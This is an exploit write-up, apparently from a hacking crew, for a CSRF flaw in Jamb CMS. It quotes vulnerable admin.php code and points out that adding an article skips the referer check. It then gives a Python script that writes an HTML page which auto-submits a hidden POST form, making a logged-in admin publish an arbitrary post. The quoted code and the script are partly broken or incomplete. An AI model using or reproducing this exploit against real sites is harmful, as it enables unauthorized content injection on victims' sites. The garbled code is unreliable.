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# Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
# Author: stoke
# Jamb CMS CSRF Arbitrary add a post
# Jamb can be downloaded here: http://darkjoker.sytes.net/archives/jamb.zip
# Let's see the bugged code:
# ---- snip from admin.php -----
if ($_GET ['act'] && is_logged () && intval ($_GET['id']) && preg_match ("|http://".$_SERVER['SERVER_NAME'].dirname($_SERVER['PHP_SELF'])."|",$_SERVER['HTTP_REFERER'])) {
$id=intval ($_GET['id']);
switch ($_GET['act']) {
case 'del':
$query = "DELETE FROM articles WHERE id = '{$id}'";
mysql_query ($query) or die ("Please edit functions.php!");
$query = "DELETE FROM comments WHERE pid = '{$id}'";
mysql_query ($query);
header ("Location: index.php");
die ();
case 'edit':
$newtitle = htmlentities (mysql_real_escape_string ($_POST['newtitle']));
$newart = mysql_real_escape_string ($_POST['newart']);
if (!$newtitle || !$newart) {
$query = "SELECT * FROM articles WHERE id = '{$id}'";
$res=mysql_query ($query);
$row=mysql_fetch_row ($res);
if (!$row[0])
die ("Wrong ID");
$row[2]=stripslashes ($row[2]);
echo "<form action = 'admin.php?act=edit&id={$id}' method = 'POST'>\n".
"Title: <input name = 'newtitle' value = '{$row[1]}'><br>\n".
"<textarea rows=30 cols=100 name='newart'>{$row[2]}</textarea><br>\n".
"<input type = 'submit' value = 'Edit'><br>\n".
else {
$query = "UPDATE articles SET title='{$newtitle}', body='{$newart}' WHERE id = '{$id}'";
mysql_query ($query);
header ("Location: index.php");
die ();
case 'delc':
$query = "DELETE FROM comments WHERE id = '{$id}'";
mysql_query ($query);
header ("Location: index.php");
die ();
case 'editc':
$newuname = htmlentities (mysql_real_escape_string ($_POST['newuname']));
$newcomm = htmlentities (mysql_real_escape_string ($_POST['newcomm']));
if (!$newuname || !$newcomm) {
$query = "SELECT * FROM comments WHERE id = '{$id}'";
$res = mysql_query ($query);
$row = mysql_fetch_row ($res);
if (!$row[0])
die ("Wrong ID");
$row[2]=stripslashes ($row[2]);
$row[3]=stripslashes ($row[3]);
echo "<form action = 'admin.php?act=editc&id={$id}' method = 'POST'>\n".
"Author: <input name = 'newuname' value = '{$row[2]}'><br>\n".
"<textarea rows=10 cols=25 name = 'newcomm'>{$row[3]}</textarea><br>\n".
"<input type = 'submit' value = 'Edit'><br>\n</form>\n";
else {
$query = "UPDATE comments SET author='{$newuname}', comment='{$newcomm}' WHERE id='{$id}'";
mysql_query ($query);
header ("Location: index.php");
die ();
if (is_logged () && $a) {
$title = htmlentities (mysql_real_escape_string ($_POST['title']));
$art = mysql_real_escape_string ($_POST['data']);
echo $title . " ".$art;
if (!$title || !$art) {
echo "<form method = 'POST'>\n".
"Title: <input name = 'title'><br>\n".
"<textarea rows=30 cols=100 name = 'data'></textarea><br>\n".
"<input type = 'submit' value = 'Send'><br>\n".
else {
$query = "INSERT INTO articles (title,body,date) VALUES ('{$title}','{$art}','".time()."');";
mysql_query ($query);
header ("Location: index.php");
die ();
# ---- end snip ----
# How you can see, only the "act" part of code has the referer checked, this is useful (for us).
# We can exploit this issue by sending a specially .html file to the admin when he/she is logged.
# I write a little script for do this
from sys import argv
if len(argv) < 4:
print "Usage: ./exploit.py <url_with_jamb_dir> <title> <content_of_post>"
print ".:[Jamb CMS CSRF Arbitrary add post exploit]:.\n\n"
url = argv[1]
title = argv[2]
content = argv[3]
print "[+] Preparing the exploit"
skeleton = """
<body onload="document.getElementById('1').submit()">
<form method="POST" id="1" action="%s/admin.php">
<input type="hidden" name="title" value="%s">
<input type="hidden" name="data" value="%s">
</form>""" % (url, title, content)
enc = skeleton
print "[+] Writing the exploit"
fd = file("exploit.html", "w")
print "[+] Done, check exploit.html"